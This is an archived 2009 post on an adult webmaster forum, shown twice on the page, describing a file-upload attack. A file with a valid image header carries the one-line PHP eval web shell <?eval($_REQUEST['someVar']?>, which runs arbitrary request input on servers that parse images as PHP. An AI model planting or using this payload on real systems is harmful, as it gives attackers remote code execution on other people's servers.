GoFuckYourself.com - Adult Webmaster Forum - View Single Post

BestXXXPorn · 09-17-2009, 01:09 PM

My favorite exploit is the fake image upload that has a correct image header...

If the image gets stored "as is" the first line of it is <?eval($_REQUEST['someVar']?>

If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating...

09-17-2009, 01:09 PM
BestXXXPorn Confirmed User Join Date: Jun 2009 Location: Asheville, NC Posts: 2,277	My favorite exploit is the fake image upload that has a correct image header... If the image gets stored "as is" the first line of it is <?eval($_REQUEST['someVar']?> If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating... __________________ ICQ: 258-202-811 \| Email: eric{at}bestxxxporn.com